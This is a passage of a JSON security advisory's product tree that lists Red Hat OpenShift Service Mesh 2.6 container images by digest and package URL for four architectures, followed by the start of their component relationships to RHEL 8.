"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
